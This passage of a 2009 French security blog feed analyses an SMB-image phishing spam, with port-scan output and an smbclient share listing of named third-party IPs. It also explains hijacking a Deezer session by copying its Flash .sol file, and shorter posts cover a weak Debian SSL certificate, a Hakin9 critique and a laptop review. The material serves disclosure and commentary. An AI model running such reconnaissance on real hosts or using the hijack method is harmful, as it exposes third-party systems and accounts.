id="actu"/]&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family: courier new;"&gt;(...)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;(J'ai remplacé les chevrons pour protéger les innocents). Il n'y a aucun lien à cliquer ... mais deux images chargées depuis un partage SMB ???&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Investigation rapide du serveur source du spam : pas de site Web accessible, une &lt;a href="http://search.live.com/results.aspx?q=ip:216.232.70.72"&gt;recherche inverse&lt;/a&gt; ne donne rien, quelques traces d'émission de spam en &lt;a href="http://www.testcompany.com/archive/October2007-42/1634.html"&gt;octobre 2007&lt;/a&gt; déjà ... Le nom de domaine a été enregistré avec l'identité suivante:&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;Latitude mens wear&lt;/div&gt;&lt;div&gt;8365 Ontario Street, Unit 100&lt;/div&gt;&lt;div&gt;Vancouver, British Columbia V5X 3E8&lt;/div&gt;&lt;div&gt;Canada&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;Il y a quelques ports TCP ouverts:&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote style="font-family: courier new;"&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;22/tcp&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;"SSH-1.99-OpenSSH_4.3"&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;23/tcp&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;"SSH-1.99-OpenSSH_4.3"&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;25/tcp&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;"220 localhost.localdomain ESMTP Sendmail 8.13.8/8.13.8; Fri, 23 Jan 2009 09:25:07 -0800"&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;110/tcp&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;"+OK Dovecot ready."&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;3389/tcp&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;10000/tcp&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Cela confirme la localisation de la machine (GMT-8). Mais difficile d'aller plus loin, surtout au vu du reverse DNS ("&lt;span style="font-family: courier new;"&gt;s216-232-70-72.bc.hsia.telus.net&lt;/span&gt;") ... L'adresse IP est-elle dynamique ? S'agit-il d'un bloc alloué à des particuliers ou des professionnels ? La machine a-t-elle été compromise, ou envoit-elle du spam de son plein gré ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La présence d'un Remote Desktop sur TCP/3389 relié à un Windows 2003 Standard, d'un Webmin en HTTPS sur TCP/10000, et de logiciels typiques du monde Unix (SSH, Sendmail, Dovecot, ...) pourrait laisser croire qu'il y a plusieurs machines derrière cette adresse. Une analyse des IPID avec &lt;a href="http://www.secdev.org/projects/scapy/demo.html"&gt;Scapy&lt;/a&gt; pourrait s'avérer utile.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vu la surface d'exposition, les méthodes de compromission potentielles ne manquent pas (brute-force SSH, faille dans &lt;a href="http://www.webmin.com/security.html"&gt;Webmin&lt;/a&gt;, ...). L'investigation a une chance sur deux de se terminer en cul-de-sac.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Passons maintenant aux deux adresses IP destination. Les bases WHOIS ne sont pas très verbeuses, a priori un simple hébergeur du côté de Dallas:&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote style="font-family: courier new;"&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Colo4Dallas LP COLO4-BLK4 (NET-207-210-192-0-1)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;                                  207.210.192.0 - 207.210.255.255&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;RimuHosting COLO4-RIMUH-042108-02 (NET-207-210-244-0-1)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;                                  207.210.244.0 - 207.210.244.127&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;# ARIN WHOIS database, last updated 2009-01-22 19:10&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;# Enter ? for additional hints on searching ARIN's WHOIS database.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;Les enregistrements DNS inverse sont plutôt ... curieux. Le premier nom de domaine n'existe pas, et le deuxième a été enregistré du côté de San Francisco.&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote style="font-family: courier new;"&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Nom :    out-of-my-hands.com&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Address:  207.210.244.20&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Nom :    africanjudicialnetwork.org&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Address:  207.210.245.78&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Ces deux sites semblent de toute façon inaccessibles, le premier étant une page Apache par défaut, et le deuxième étant "cassé". Encore des machines compromises ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Là où ça devient intéressant (si ça ne l'était pas déjà ;), c'est lorsqu'on se rend compte que ces deux machines exposent réellement un service SMB sur Internet !&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;blockquote style="font-family: courier new;"&gt;&lt;div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Interesting ports on out-of-my-hands.com (207.210.244.20):&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;PORT    STATE  SERVICE&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;135/tcp closed msrpc&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;139/tcp open   netbios-ssn&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;445/tcp open   microsoft-ds&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Interesting ports on africanjudicialnetwork.org (207.210.245.78):&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;PORT    STATE  SERVICE&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;135/tcp closed msrpc&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;139/tcp open   netbios-ssn&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;445/tcp open   microsoft-ds&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Une tentative de connexion donne le même résultat dans les 2 cas:&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div style="font-family: courier new;"&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;$ smbclient -L \\\\207.210.244.20&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Password:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.2.6]&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        Sharename       Type      Comment&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        ---------       ----      -------&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.2.6]&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        Server               Comment&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        ---------            -------&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        SMBSHARE&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        Workgroup            Master&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        ---------            -------&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;        WORKGROUP            SMBSHARE&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;Le répertoire &lt;span style="font-family: courier new;"&gt;/images/&lt;/span&gt; existe réellement sur le serveur, et son contenu laisse présager de nombreuses tentatives de fraude en cours (Impôts, Voyages-Sncf, Expedia et Facebook) ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Là où ça devient vraiment grave, c'est qu'un client Windows XP SP3 en configuration standard va s'authentifier automatiquement en LM/NTLM sur le serveur avec un tel lien !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A ce stade, il serait réellement intéressant de savoir ce qu'il advient côté serveur. Les authentifications sont-elles capturées et "craquées" ? Une attaque en relais SMB est-elle immédiatement tentée sur le poste client (on peut toutefois espérer que de nombreux FAI français filtrent les ports requis) ? Ou s'agit-il juste pour l'auteur du spam d'afficher correctement ses images ? Le problème étant que j'ai du mal à percevoir l'objectif final du spam (autre que la capture des authentifiants), celui-ci n'ayant aucun lien cliquable ...&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;PS. La cerise sur le gateau, c'est que Blogger sous &lt;a href="http://www.google.com/chrome"&gt;Google Chrome&lt;/a&gt; a trouvé intelligent d'interpréter les liens "img" lorsque je suis passé en mode "edit HTML", &lt;ip&gt; puis de charger les images susdites ... donc je me suis fait avoir en écrivant ce post !&lt;/ip&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-9067511934543784557?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/9067511934543784557/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=9067511934543784557' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/9067511934543784557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/9067511934543784557'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/youve-got-mail.html' title='You&apos;ve got mail !'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6180428281811515530</id><published>2009-01-19T09:00:00.000+01:00</published><updated>2009-01-19T09:00:00.655+01:00</updated><title type='text'>Comment accéder à un compte Deezer</title><content type='html'>Les temps changent.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A une époque, quand j'invitais des gens à la maison, ils venaient avec leur tour de CD. Puis leur lecteur MP3 (iPod en tête). Maintenant ils s'installent sur mon PC et utilisent leur compte &lt;a href="http://www.deezer.com/"&gt;Deezer&lt;/a&gt; pour nous infliger leurs &lt;span class="Apple-style-span" style="font-style: italic;"&gt;playlists&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je suis également un peu paranoïaque. Alors je configure mon &lt;a href="http://www.mozilla.com/"&gt;Firefox&lt;/a&gt; pour nettoyer tous les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;cookies&lt;/span&gt; à la fermeture du navigateur. Quelle surprise, donc, que de retrouver la session d'un autre ouverte lorsque je relance le navigateur !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;L'explication est simple : Deezer est une application &lt;span class="Apple-style-span" style="font-style: italic;"&gt;riche&lt;/span&gt;, utilisant massivement Flash. Et en particulier l'espace de &lt;a href="http://www.adobe.com/support/flash/action_scripts/actionscript_dictionary/actionscript_dictionary648.html"&gt;stockage persistant&lt;/a&gt; offert par cette technologie.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si vous utilisez Firefox, le fichier se trouve dans le répertoire:&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;%AppData%\Macromedia\Flash Player\#SharedObjects\&lt;nom&gt;\www.deezer.com\deezer.sol&lt;/nom&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il s'agit d'un format binaire, mais deux chaines de caractères sautent aux yeux: l'adresse mel et un condensat MD5 (en format texte hexadécimal) correspondant au mot de passe.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr il est envisageable &lt;a href="http://www.freerainbowtables.com/"&gt;d'inverser le condensat&lt;/a&gt;, mais le plus reste de copier le fichier".sol" directement pour rentrer dans la session de l'utilisateur ... et pouvoir enfin lui faire découvrir de la "bonne" musique :)&lt;br /&gt;&lt;br /&gt;Mes conclusions quant à cette affaire:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Comme toujours, la &lt;span style="font-style: italic;"&gt;mise en oeuvre&lt;/span&gt; des algorithmes cryptographiques est essentielle. Inutile d'utiliser MD5 si c'est pour authentifier l'utilisateur uniquement avec son &lt;span style="font-style: italic;"&gt;hash&lt;/span&gt;. Cela fait partie des thèmes que j'aborde dans ma soumission au SSTIC :)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Ne jamais utiliser un PC qui n'est pas le sien. Non seulement il est impossible de faire confiance à un PC pris au hasard de nos jours, mais de plus il existe une quantité phénoménale de traces résiduelles, comme le démontrent les développements du &lt;span style="font-style: italic;"&gt;forensics offensif&lt;/span&gt; (&lt;a href="http://www.msuiche.net/"&gt;&lt;span style="font-style: italic;"&gt;offensics&lt;/span&gt;&lt;/a&gt;).&lt;br /&gt;&lt;/li&gt;&lt;li&gt;A chaque fois qu'une nouvelle option de sécurité et/ou de confidentialité est proposée par le navigateur, les développeurs du Web 2.0 (ou les concepteurs des normes associées) inventent une méthode de contournement pour rendre l'expérience utilisateur plus &lt;span style="font-style: italic;"&gt;riche&lt;/span&gt;. Ca promet ...&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6180428281811515530?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6180428281811515530/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6180428281811515530' title='14 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6180428281811515530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6180428281811515530'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/comment-accder-un-compte-deezer.html' title='Comment accéder à un compte Deezer'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4220258185516477450</id><published>2009-01-15T08:30:00.001+01:00</published><updated>2009-01-15T08:54:29.870+01:00</updated><title type='text'>The Debian is for pwn!</title><content type='html'>Joli &lt;span class="Apple-style-span" style="font-style: italic;"&gt;headshot&lt;/span&gt; ce matin à la Gare de Lyon:&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/neuf_crt.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 429px; height: 526px;" src="http://newsoft.dyndns.org/blog/neuf_crt.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour résumer, si quelqu'un enregistre ou a enregistré le trafic SSL sur ce &lt;span class="Apple-style-span" style="font-style: italic;"&gt;hotspot&lt;/span&gt; WiFi ces 3 dernières années, les identifiants de tous les clients Neuf sont volés.&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Merci à l'extension &lt;a href="http://codefromthe70s.org/sslblacklist.aspx"&gt;SSL BlackList&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;PS. Si quelqu'un a un contact chez SFR_Neuf_Cegetel, c'est le moment. Parce que là &lt;a href="http://www.lucianobello.com.ar/exploiting_DSA-1571/"&gt;c'est du sérieux&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4220258185516477450?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4220258185516477450/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4220258185516477450' title='15 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4220258185516477450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4220258185516477450'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/debian-is-for-pwn.html' title='The Debian is for pwn!'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>15</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7326044363860919728</id><published>2009-01-12T09:00:00.001+01:00</published><updated>2009-01-12T09:00:00.703+01:00</updated><title type='text'>La punition</title><content type='html'>La lecture du &lt;a href="http://www.hakin9.org/prt/view/actualites/issue/943.html"&gt;Hakin9&lt;/a&gt; de janvier est particulièrement punitive. Malgré quelques articles d'une certaine tenue, on y trouve également le pire ...&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Par exemple un article du "fameux" Aditya K. Sood, qui a sévit un moment sur la liste &lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;a href="http://seclists.org/fulldisclosure/2007/Sep/"&gt;Full Disclosure&lt;/a&gt;&lt;/span&gt; en publiant des "papiers" de "recherche" avant de se voir décerner le titre de &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Lame Ass of the Month&lt;/span&gt; par &lt;a href="http://expertmiami.blogspot.com/2007/09/whitehat-noise.html"&gt;Kostya&lt;/a&gt; et &lt;a href="http://seclists.org/fulldisclosure/2007/Sep/0027.html"&gt;d'autres&lt;/a&gt;, et de disparaitre (provisoirement).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voici un extrait de l'article. Si vous avez une idée de ce qu'est &lt;a href="http://fr.wikipedia.org/wiki/DEP"&gt;DEP&lt;/a&gt; (en vrai), cela devrait vous faire sourire sur le fond - et sur la forme. Désolé pour la qualité du scan, la police extrêmement fine et totalement illisible utilisée par la nouvelle maquette du journal ne passe pas bien au &lt;span class="Apple-style-span" style="font-style: italic;"&gt;scan&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hakin9_jan01.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 354px; height: 516px;" src="http://newsoft.dyndns.org/blog/hakin9_jan01.png" alt="" border="0" /&gt;&lt;/a&gt;On trouve également un article sur Google &lt;a href="http://www.google.com/chrome/?hl=fr"&gt;Chrome&lt;/a&gt;, écrit par "un autodidacte et passionné [de sécurité informatique] motivé par l'esprit alternatif de la communauté UnderGround".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Donc si vous voulez des informations sur les choix de conception, les techniques d'isolation des processus de rendu, ou l'implémentation du moteur JavaScript V8, je vous conseille fortement de lire la &lt;a href="http://www.google.com/googlebooks/chrome/"&gt;bande dessinée,&lt;/a&gt; les &lt;a href="http://crypto.stanford.edu/websec/chromium/chromium-security-architecture.pdf"&gt;papiers&lt;/a&gt; ou le &lt;a href="http://code.google.com/intl/fr-FR/chromium/"&gt;code source&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si par contre vous voulez halluciner avec un article écrit dans un style ampoulé et emphatique, qui présente une liste des failles publiques (disponible par ailleurs sur &lt;a href="http://secunia.com/advisories/product/20760/"&gt;Secunia&lt;/a&gt;) pour ensuite délirer sur l'exploitation des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;buffer overflow&lt;/span&gt; dans Windows (sans prendre en compte les contre-mesures implémentées dans Chrome), alors procurez vous d'urgence ce numéro.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voici un extrait de la conclusion pour vous donner une idée:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hakin9_jan02.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 362px; height: 458px;" src="http://newsoft.dyndns.org/blog/hakin9_jan02.png" alt="" border="0" /&gt;&lt;/a&gt;Il semble que l'auteur soit également modérateur du nouveau forum &lt;a href="http://forum-fr.hakin9.org/"&gt;Hakin9-FR&lt;/a&gt;. Ca promet ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;PS. On ne dit pas "à coeur perdu" mais "à corps perdu". Et on ne dit pas "querelle d'églises" mais "querelles de clochers".&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7326044363860919728?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7326044363860919728/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7326044363860919728' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7326044363860919728'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7326044363860919728'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/la-punition.html' title='La punition'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7053957055640042008</id><published>2009-01-05T09:00:00.000+01:00</published><updated>2009-01-05T09:00:00.824+01:00</updated><title type='text'>Utiliser OpenVPN 2.1 sous Vista64</title><content type='html'>Dans la folie des dépenses d'investissement de fin d'année, mes collègues ont sélectionné pour moi un nouveau laptop de &lt;span class="Apple-style-span" style="font-style: italic;"&gt;daron&lt;/span&gt;^H^H^H^H^H &lt;span class="Apple-style-span" style="font-style: italic;"&gt;senior expert&lt;/span&gt; : le &lt;a href="http://www1.euro.dell.com/content/products/productdetails.aspx/laptop_latitude_e4300?c=fr"&gt;Dell E4300&lt;/a&gt;.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Passons sur les 2 mois de délai (au lieu des 10 jours annoncés), puisque la bête est arrivée pour Noël, je m'apprête à ressentir le frisson d'un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;top manager&lt;/span&gt; devant son nouveau jouet: 4 Go de RAM, 250 Go de disque, processeur Core 2 Duo, 3G+ et GPS intégrés, et ... Vista 64.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La première prise de contact avec la bête est plutôt ... rugueuse.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/dell_e4300.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 528px; height: 396px;" src="http://newsoft.dyndns.org/blog/dell_e4300.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Un problème dans le driver de la carte BroadCom intégrée ... il est temps de chercher les mises à jour sur le &lt;a href="http://support.euro.dell.com/support/downloads/driverslist.aspx?os=WV64&amp;amp;osl=FR&amp;amp;catid=-1&amp;amp;impid=-1&amp;amp;servicetag=&amp;amp;SystemID=LAT_E4300&amp;amp;hidos=WLH&amp;amp;hidlang=fr&amp;amp;TabIndex="&gt;site de Dell&lt;/a&gt;. Et là, c'est le drame:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Plusieurs centaines de Mo de mises à jour à télécharger.&lt;/li&gt;&lt;li&gt;La palme revient à la "mise à jour du hub de sécurité Broadcom", qui nécessite de booter sous FreeDOS avec le TPM désactivé (note: la machine est livrée sans lecteur de CD-ROM par défaut).&lt;/li&gt;&lt;li&gt;Certaines mises à jour "urgentes" étaient carrément identifiées comme "à venir" !&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Les plus taquins d'entre vous pensent déjà "tu n'as qu'à passer sous Linux". Que nenni ! Car outre les défauts du logiciel, le matériel pêche également:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Pas de port PCMCIA mais seulement un port ExpressCard. Passe encore, c'est l'avenir.&lt;/li&gt;&lt;li&gt;J'aurais aimé un écran tactile (TabletPC) qui aurait beaucoup amusé ma fille - mais il parait que c'est &lt;span class="Apple-style-span" style="font-style: italic;"&gt;beaucoup&lt;/span&gt; plus cher.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Il faut choisir en usine entre WebCam et 3G+ (WTF ? La cause en serait le positionnement de l'antenne 3G+ autour de l'écran).&lt;/li&gt;&lt;li&gt;La machine ne dispose que d'un seul port USB. Pas évident quand on est allergique au Touchpad de brancher une clé USB et une souris externe simultanément. Sauf si vous avez une clé eSata, bien sûr ...&lt;/li&gt;&lt;li&gt;Une autonomie de 3h30 max, quel que soit le système d'exploitation. Mon vieux &lt;a 